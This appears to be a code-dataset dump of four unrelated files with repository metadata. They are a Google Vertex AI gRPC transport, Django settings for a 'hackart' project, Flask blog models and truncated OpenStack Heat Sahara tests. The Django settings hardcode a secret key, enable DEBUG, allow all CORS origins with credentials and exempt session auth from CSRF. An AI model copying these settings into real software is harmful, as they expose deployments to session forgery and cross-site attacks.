# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Awaitable, Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import gapic_v1 # type: ignore
from google.api_core import grpc_helpers_async # type: ignore
from google.api_core import operations_v1 # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import packaging.version
import grpc # type: ignore
from grpc.experimental import aio # type: ignore
from google.cloud.aiplatform_v1.types import migration_service
from google.longrunning import operations_pb2 # type: ignore
from .base import MigrationServiceTransport, DEFAULT_CLIENT_INFO
from .grpc import MigrationServiceGrpcTransport
class MigrationServiceGrpcAsyncIOTransport(MigrationServiceTransport):
"""gRPC AsyncIO backend transport for MigrationService.
A service that migrates resources from automl.googleapis.com,
datalabeling.googleapis.com and ml.googleapis.com to Vertex AI.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_grpc_channel: aio.Channel
_stubs: Dict[str, Callable] = {}
@classmethod
def create_channel(cls,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs) -> aio.Channel:
"""Create and return a gRPC AsyncIO channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
aio.Channel: A gRPC AsyncIO channel object.
"""
return grpc_helpers_async.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs
)
def __init__(self, *,
host: str = 'aiplatform.googleapis.com',
credentials: ga_credentials.Credentials = None,
credentials_file: Optional[str] = None,
scopes: Optional[Sequence[str]] = None,
channel: aio.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id=None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
channel (Optional[aio.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or applicatin default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
self._operations_client = None
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
credentials=self._credentials,
credentials_file=credentials_file,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@property
def grpc_channel(self) -> aio.Channel:
"""Create the channel designed to connect to this service.
This property caches on the instance; repeated calls return
the same channel.
"""
# Return the channel from cache.
return self._grpc_channel
@property
def operations_client(self) -> operations_v1.OperationsAsyncClient:
"""Create the client designed to process long-running operations.
This property caches on the instance; repeated calls return the same
client.
"""
# Sanity check: Only create a new client if we do not already have one.
if self._operations_client is None:
self._operations_client = operations_v1.OperationsAsyncClient(
self.grpc_channel
)
# Return the client from cache.
return self._operations_client
@property
def search_migratable_resources(self) -> Callable[
[migration_service.SearchMigratableResourcesRequest],
Awaitable[migration_service.SearchMigratableResourcesResponse]]:
r"""Return a callable for the search migratable resources method over gRPC.
Searches all of the resources in
automl.googleapis.com, datalabeling.googleapis.com and
ml.googleapis.com that can be migrated to Vertex AI's
given location.
Returns:
Callable[[~.SearchMigratableResourcesRequest],
Awaitable[~.SearchMigratableResourcesResponse]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'search_migratable_resources' not in self._stubs:
self._stubs['search_migratable_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/SearchMigratableResources',
request_serializer=migration_service.SearchMigratableResourcesRequest.serialize,
response_deserializer=migration_service.SearchMigratableResourcesResponse.deserialize,
)
return self._stubs['search_migratable_resources']
@property
def batch_migrate_resources(self) -> Callable[
[migration_service.BatchMigrateResourcesRequest],
Awaitable[operations_pb2.Operation]]:
r"""Return a callable for the batch migrate resources method over gRPC.
Batch migrates resources from ml.googleapis.com,
automl.googleapis.com, and datalabeling.googleapis.com
to Vertex AI.
Returns:
Callable[[~.BatchMigrateResourcesRequest],
Awaitable[~.Operation]]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if 'batch_migrate_resources' not in self._stubs:
self._stubs['batch_migrate_resources'] = self.grpc_channel.unary_unary(
'/google.cloud.aiplatform.v1.MigrationService/BatchMigrateResources',
request_serializer=migration_service.BatchMigrateResourcesRequest.serialize,
response_deserializer=operations_pb2.Operation.FromString,
)
return self._stubs['batch_migrate_resources']
__all__ = (
'MigrationServiceGrpcAsyncIOTransport',
)
|
apache-2.0
| -6,148,530,257,652,525,000
| 45.537459
| 102
| 0.623084
| false
| 4.735499
| false
| false
| false
|
mhefley/hackart
|
hackart/settings.py
|
1
|
4632
|
"""
Django settings for hackart project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '7$x4x@#=w^_@d*yep49wfla2)lvu^!g)&+ea76n2xjkqyno(n#'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['gitlab.nullify.online']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
#App specific
'rest_framework',
'api',
'corsheaders'
]
REST_FRAMEWORK = {
# Use Django's standard `django.contrib.auth` permissions,
# or allow read-only access for unauthenticated users.
'DEFAULT_PERMISSION_CLASSES': [
#'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'
'rest_framework.permissions.IsAuthenticated'
],
'PAGE_SIZE': 10,
'EXCEPTION_HANDLER': 'rest_framework_json_api.exceptions.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework_json_api.pagination.PageNumberPagination',
'DEFAULT_PARSER_CLASSES': (
'rest_framework_json_api.parsers.JSONParser',
'rest_framework.parsers.FormParser',
'rest_framework.parsers.MultiPartParser'
),
'DEFAULT_AUTHENTICATION_CLASSES': [
'api.rest_framework_config.CsrfExemptSessionAuthentication',
'rest_framework.authentication.SessionAuthentication'
],
'DEFAULT_RENDERER_CLASSES': (
'rest_framework_json_api.renderers.JSONRenderer',
'rest_framework.renderers.BrowsableAPIRenderer',
),
'DEFAULT_METADATA_CLASS': 'rest_framework_json_api.metadata.JSONAPIMetadata',
}
MIDDLEWARE_CLASSES = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
]
CORS_ORIGIN_ALLOW_ALL = True
CORS_ALLOW_CREDENTIALS = True
ROOT_URLCONF = 'hackart.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'hackart.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
|
mit
| -2,741,053,265,845,104,000
| 27.316456
| 91
| 0.668826
| false
| 3.650118
| false
| false
| false
|
Blackyukun/Simpleblog
|
app/models.py
|
1
|
15497
|
import datetime
from flask_login import UserMixin, AnonymousUserMixin
from flask import current_app, request, url_for
from hashlib import md5
from werkzeug.security import generate_password_hash, check_password_hash
from markdown import markdown
import bleach
from itsdangerous import TimedJSONWebSignatureSerializer as Serializer
from app.exceptions import ValidationError
from app import db, lm, whooshee
"""
generate_password_hash(password, method=pbkdf2:sha1, salt_length=8):这个函数将原始密码作为输入,
以字符串形式输出密码的散列值,输出的值可保存在用户数据库中,
method和salt_length的默认值就能满足大多数需求。
check_password_hash(hash, password):这个函数的参数是从数据库中取回的密码散列值和用户输入的密码。
返回值为True表明密码正确。
flask_login的UserMixin类,实现了用户方法:
is_authenticated:如果用户已经登录,必须返回True,否则返回False
is_active:如果允许用户登录,必须返回True,否则返回False。如果要禁用账户,可以返回False
is_anonymous:对普通用户必须返回False
fet_id():必须返回用户的唯一标识符,使用Unicode编码字符串
实现了关注和被关注的多对多数据模型,followed和followers关系都定义为单独的一对多关系。
必须使用可选参数foreign_keys指定的外键,用来消除外键简的歧义。
db.backref()参数并非指定这两个关系之间的引用关系,而是回引Follow模型。回引的lazy参数为joined。
cascade参数的值是一组由逗号分隔的层叠选项,all表示除了dalete-orphan之外的所有层叠选项。
意思是启用所有默认层叠选项,而且还要删除孤记录。
is_following()方法和is_followed_by()方法分别在左右两边的一对多关系中搜索指定用户,如果找到就返回True
获取关注用户的文章:
db.session.query(Post)指明这个查询要返回Post对象
select_from(Follow)的意思是这个查询从Follow模型开始
filter_by(follower_id=self.id)使用关注用户过滤follows表
join(Post, Follow.followed_id==Post.author_id)联结filter_by()得到的结果和Post对象
角色模型的permissions字段的值是一个整数,表示位标志。各操作都对应一个位位置,能执行某项操作的角色,其位会被设为1
程序权限:
关注用户:0x01
发表评论:0x02
发表文章或提问:0x04
管理他人评论:0x08
管理员:0x80
用户角色:
游客:0x00 未登录的用户,只有阅读权限
用户:0x07 具有发布文章,提问,评论和关注用户的权限,默认角色
小管家:0x0f 审查不当评论的权限
管理员:0xff 有所有权限,包括修改用户角色权限
创建数据库后,需要创建用户角色,先更新数据库,然后:
使用python manage.py shell
>>> Role.insert_roles()
>>> Role.query.all()
Comment模型和Post模型的属性一样,但是多了个disabled字段。这是个布尔值字段,作者可以通过这个字段查禁不当评论。
Post模型也添加disabled字段。
会话模型中,lazy='joined'指明加载记录,使用联结,primaryjoin明确指定两个模型之间使用的联结条件。
为了消除外键之间的歧义,定义关系时必须使用可选参数 foreign_keys 指定的外键。
cascade 参数的值是一组有逗号分隔的层叠选项,all 表示除了 delete-orphan 之外的所有层叠选项。
all,delete-orphan 的意思是启用所有默认层叠选项,而且还要删除孤儿记录。
在User模型上添加基于令牌的认证方法:
generate_auth_token()方法使用编码后的用户id字段值生成一个签名令牌,指定了以秒为单位的过期时间。
verify_auth_token()方法接收的参数是一个令牌,如果令牌可用就返回对应的用户。
"""
# 关注关联表
class Follow(db.Model):
__tablename__ = 'follows'
follower_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
followed_id = db.Column(db.Integer, db.ForeignKey('users.id'), primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, default=datetime.datetime.utcnow)
# messages = db.relationship('Message', backref='follow', uselist=False)
class User(UserMixin,db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
nickname = db.Column(db.String(64), index=True, unique=True)
email = db.Column(db.String(120), index=True, unique=True)
password_hash = db.Column(db.String(128))
# 关联
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
posts = db.relationship('Post', backref='author', lazy='dynamic')
# post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
likes = db.relationship('Like', backref='user', lazy='dynamic')
comments = db.relationship('Comment', backref='author', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='author', lazy='dynamic')
# 个人资料
about_me = db.Column(db.String(140))
last_seen = db.Column(db.DateTime)
# 关注,被关注
followed = db.relationship('Follow',
foreign_keys = [Follow.follower_id],
backref = db.backref('follower', lazy='joined'),
lazy = 'dynamic',
cascade = 'all, delete-orphan')
followers = db.relationship('Follow',
foreign_keys=[Follow.followed_id],
backref=db.backref('followed', lazy='joined'),
lazy='dynamic',
cascade='all, delete-orphan')
def __init__(self, **kwargs):
super(User, self).__init__(**kwargs)
if self.role is None:
if self.email == current_app.config['ADMINMAIL']:
self.role = Role.query.filter_by(permissions=0xff).first()
if self.role is None:
self.role = Role.query.filter_by(default=True).first()
# 检查用户是否有指定权限
def operation(self, permissions):
return self.role is not None and \
(self.role.permissions & permissions) == permissions
def is_administrator(self):
return self.operation(Permission.ADMINISTER)
# 关注
def follow(self, user):
if not self.is_following(user):
follower = Follow(follower=self, followed=user)
db.session.add(follower)
# 取消关注
def unfollow(self, user):
follower =self.followed.filter_by(followed_id=user.id).first()
if follower:
db.session.delete(follower)
# 做了一个followed关系查询,这个查询返回所有当前用户作为关注者的(follower, followed)对
def is_following(self, user):
return self.followed.filter_by(followed_id=user.id).first() is not None
def is_followed_by(self, user):
return self.followers.filter_by(follower_id=user.id).first() is not None
# 获取关注者文章
@property
def followed_posts(self):
return Post.query.join(Follow, Follow.followed_id==Post.author_id).filter(
Follow.follower_id==self.id)
# python内置装饰器,把一个方法变为属性调用
@property
def password(self):
raise AttributeError('password is not a readable attribute')
@password.setter
def password(self, password):
self.password_hash = generate_password_hash(password)
def verify_password(self, password):
return check_password_hash(self.password_hash, password)
# Gravatar提供用户头像
def gravatar(self, size):
return 'http://www.gravatar.com/avatar/' + md5(self.email.encode('utf-8')).hexdigest() + '?d=mm&s=' + str(size)
# 支持基于令牌的认证
def generate_auth_token(self, expiration):
s = Serializer(current_app.config['ECRET_KEY'],expires_in=expiration)
return s.dumps({'id': self.id})
@staticmethod
def verify_auth_token(token):
s = Serializer(current_app.config['SECRET_KEY'])
try:
data = s.loads(token)
except:
return None
return User.query.get(data['id'])
# 把用户转换成JSON格式的序列化字典
# 提供给客户端的内容无需和数据库模型内部完全一致
def to_json(self):
json_user = {
'url': url_for('api.get_user', id=self.id, _external=True),
'nickname': self.nickname,
'last_seen': self.last_seen,
'posts': url_for('api.get_user_posts', id=self.id, _external=True),
'followed_posts': url_for('api.get_user_followed_posts', id=self.id, _external=True),
'post_count': self.posts.count()
}
return json_user
def __repr__(self):
return '<User %r>' % (self.nickname)
@lm.user_loader
def load_user(user_id):
return User.query.get(int(user_id))
class Role(db.Model):
__tablename__ = 'roles'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
default = db.Column(db.Boolean, default=False, index=True)
permissions = db.Column(db.Integer)
users = db.relationship('User', backref = 'role', lazy='dynamic')
@staticmethod
def insert_roles():
roles = {
'User': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES, True),
'Moderator': (Permission.FOLLOW |
Permission.COMMENT |
Permission.WRITE_ARTICLES |
Permission.MODERATE_COMMENTS, False),
'Administrator': (0xff, False)
}
for r in roles:
role = Role.query.filter_by(name=r).first()
if role is None:
role = Role(name=r)
role.permissions = roles[r][0]
role.default = roles[r][1]
db.session.add(role)
db.session.commit()
def __repr__(self):
return '<Role %r>' % (self.name)
class Permission:
FOLLOW = 0x01
COMMENT = 0x02
WRITE_ARTICLES = 0x04
MODERATE_COMMENTS = 0x08
ADMINISTER = 0x80
@whooshee.register_model('title','body')
class Post(db.Model):
__tablename__ = 'posts'
# __searchable__ = ['body']
id = db.Column(db.Integer, primary_key = True)
title = db.Column(db.String(64))
body = db.Column(db.Text)
disabled = db.Column(db.Boolean)
view_num = db.Column(db.Integer, default=0)
body_html = db.Column(db.Text)
draft = db.Column(db.Boolean, default=False)
# outline = db.Column(db.String(250))
# like_num = db.Column(db.Integer, default=0)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
like_num = db.relationship('Like', backref='post', lazy='dynamic')
comments = db.relationship('Comment', backref='post', lazy='dynamic')
# reply_comments = db.relationship('Reply', backref='post', lazy='dynamic')
@staticmethod
def preview_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'img', 'blockquote', 'code',
'em', 'i', 'li', 'ol', 'pre', 'strong', 'ul', 'h1', 'h2',
'h3', 'p'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True,
attributes={
'*': ['class'],
'a': ['href', 'rel'],
'img': ['src', 'alt'], # 支持标签和属性
}
))
# 把文章转换成JSON格式的序列化字典
def to_json(self):
json_post = {
'url': url_for('api.get_post', id=self.id, _external=True),
'title': self.title,
'body': self.body,
'body_html': self.body_html,
'timestamp': self.timestamp,
'author': url_for('api.get_user', id=self.author_id, _external=True),
'comments': url_for('api.get_post_comments', id=self.id, _external=True),
'comment_count': self.comments.count()
}
return json_post
@staticmethod
def from_json(json_post):
body = json_post.get('body')
title = json_post.get('title')
if body is None or body == '':
raise ValidationError('post does not have a body')
if title is None or title == '':
raise ValidationError('post does not have a title')
return Post(body=body,title=title)
def __repr__(self):
return '<Post %r>' % (self.body)
db.event.listen(Post.body, 'set', Post.preview_body)
# 检验用户权限对应的类
class AnonymousUser(AnonymousUserMixin):
def operation(self, permissions):
return False
def is_administrator(self):
return False
lm.anonymous_user = AnonymousUser
# 点赞
class Like(db.Model):
__tablename__ = 'likes'
id = db.Column(db.Integer, primary_key=True)
unread = db.Column(db.Boolean, default=True)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
liker_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
class Comment(db.Model):
__tablename__ = 'comments'
id = db.Column(db.Integer, primary_key=True)
body = db.Column(db.Text)
body_html = db.Column(db.Text)
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
disabled = db.Column(db.Boolean)
comment_type = db.Column(db.String(64), default='comment')
reply_to = db.Column(db.String(128), default='notReply')
unread = db.Column(db.Boolean)
author_id = db.Column(db.Integer, db.ForeignKey('users.id'))
post_id = db.Column(db.Integer, db.ForeignKey('posts.id'))
@staticmethod
def on_changed_body(target, value, oldvalue, initiator):
allowed_tags = [
'a', 'abbr', 'acronym', 'b', 'code', 'em', 'img', 'i', 'strong'
]
target.body_html = bleach.linkify(bleach.clean(
markdown(value, output_format='html'),
tags=allowed_tags, strip=True
))
db.event.listen(Comment.body, 'set', Comment.on_changed_body)
# 会话
class Conversation(db.Model):
__tablename__ = 'conversations'
id = db.Column(db.Integer, primary_key=True)
from_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
to_user_id = db.Column(db.Integer, db.ForeignKey('users.id'))
letter = db.Column(db.String(255))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
unread = db.Column(db.Boolean, default=True)
to_user = db.relationship('User', lazy='joined', foreign_keys=[to_user_id])
from_user = db.relationship('User', lazy='joined', foreign_keys=[from_user_id])
# 管理
class Admin(db.Model):
__tablename__ = 'admin'
id = db.Column(db.Integer, primary_key=True)
notice = db.Column(db.String(25))
timestamp = db.Column(db.DateTime, index=True, default=datetime.datetime.utcnow())
def __repr__(self):
return '<Admin %r>' % (self.notice)
|
mit
| 6,585,300,988,462,585,000
| 35.289973
| 119
| 0.631917
| false
| 2.672854
| false
| false
| false
|
maestro-hybrid-cloud/heat
|
heat/tests/test_sahara_templates.py
|
1
|
14859
|
# Copyright (c) 2014 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
import six
from heat.common import exception
from heat.common import template_format
from heat.engine.clients.os import neutron
from heat.engine.clients.os import nova
from heat.engine.clients.os import sahara
from heat.engine.resources.openstack.sahara import sahara_templates as st
from heat.engine import scheduler
from heat.tests import common
from heat.tests import utils
node_group_template = """
heat_template_version: 2013-05-23
description: Sahara Node Group Template
resources:
node-group:
type: OS::Sahara::NodeGroupTemplate
properties:
name: node-group-template
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
volume_type: lvm
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
is_proxy_gateway: True
"""
cluster_template = """
heat_template_version: 2013-05-23
description: Sahara Cluster Template
resources:
cluster-template:
type: OS::Sahara::ClusterTemplate
properties:
name: test-cluster-template
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
cluster_template_without_name = """
heat_template_version: 2013-05-23
resources:
cluster_template!:
type: OS::Sahara::ClusterTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
neutron_management_network: some_network
"""
node_group_template_without_name = """
heat_template_version: 2013-05-23
resources:
node_group!:
type: OS::Sahara::NodeGroupTemplate
properties:
plugin_name: vanilla
hadoop_version: 2.3.0
flavor: m1.large
floating_ip_pool: some_pool_name
node_processes:
- namenode
- jobtracker
"""
class FakeNodeGroupTemplate(object):
def __init__(self):
self.id = "some_ng_id"
self.name = "test-cluster-template"
self.to_dict = lambda: {"ng-template": "info"}
class FakeClusterTemplate(object):
def __init__(self):
self.id = "some_ct_id"
self.name = "node-group-template"
self.to_dict = lambda: {"cluster-template": "info"}
class SaharaNodeGroupTemplateTest(common.HeatTestCase):
def setUp(self):
super(SaharaNodeGroupTemplateTest, self).setUp()
self.stub_FlavorConstraint_validate()
self.stub_SaharaPluginConstraint()
self.stub_VolumeTypeConstraint_validate()
self.patchobject(nova.NovaClientPlugin, 'get_flavor_id'
).return_value = 'someflavorid'
self.patchobject(neutron.NeutronClientPlugin, '_create')
self.patchobject(neutron.NeutronClientPlugin, 'find_neutron_resource'
).return_value = 'some_pool_id'
sahara_mock = mock.MagicMock()
self.ngt_mgr = sahara_mock.node_group_templates
self.plugin_mgr = sahara_mock.plugins
self.patchobject(sahara.SaharaClientPlugin,
'_create').return_value = sahara_mock
self.patchobject(sahara.SaharaClientPlugin, 'validate_hadoop_version'
).return_value = None
self.fake_ngt = FakeNodeGroupTemplate()
self.t = template_format.parse(node_group_template)
def _init_ngt(self, template):
self.stack = utils.parse_stack(template)
return self.stack['node-group']
def test_ngt_resource_mapping(self):
ngt = self._init_ngt(self.t)
mapping = st.resource_mapping()
self.assertEqual(st.SaharaNodeGroupTemplate,
mapping['OS::Sahara::NodeGroupTemplate'])
self.assertIsInstance(ngt,
st.SaharaNodeGroupTemplate)
def _create_ngt(self, template):
ngt = self._init_ngt(template)
self.ngt_mgr.create.return_value = self.fake_ngt
scheduler.TaskRunner(ngt.create)()
self.assertEqual((ngt.CREATE, ngt.COMPLETE), ngt.state)
self.assertEqual(self.fake_ngt.id, ngt.resource_id)
return ngt
def test_ngt_create(self):
self._create_ngt(self.t)
args = {
'name': 'node-group-template',
'plugin_name': 'vanilla',
'hadoop_version': '2.3.0',
'flavor_id': 'someflavorid',
'description': "",
'volumes_per_node': None,
'volumes_size': None,
'volume_type': 'lvm',
'security_groups': None,
'auto_security_group': None,
'availability_zone': None,
'volumes_availability_zone': None,
'node_processes': ['namenode', 'jobtracker'],
'floating_ip_pool': 'some_pool_id',
'node_configs': None,
'image_id': None,
'is_proxy_gateway': True,
'volume_local_to_instance': None,
'use_autoconfig': None
}
self.ngt_mgr.create.assert_called_once_with(**args)
def test_validate_floatingippool_on_neutron_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = True
self.patchobject(
neutron.NeutronClientPlugin, 'find_neutron_resource'
).side_effect = [
neutron.exceptions.NeutronClientNoUniqueMatch(message='Too many'),
neutron.exceptions.NeutronClientException(message='Not found',
status_code=404)
]
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Too many',
six.text_type(ex))
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found',
six.text_type(ex))
def test_validate_floatingippool_on_novanetwork_fails(self):
ngt = self._init_ngt(self.t)
self.patchobject(ngt, 'is_using_neutron').return_value = False
nova_mock = mock.MagicMock()
nova_mock.floating_ip_pools.find.side_effect = (
nova.exceptions.NotFound(404, message='Not found'))
self.patchobject(nova.NovaClientPlugin,
'_create').return_value = nova_mock
ex = self.assertRaises(exception.StackValidationFailed, ngt.validate)
self.assertEqual('Not found', six.text_type(ex))
def test_validate_flavor_constraint_return_false(self):
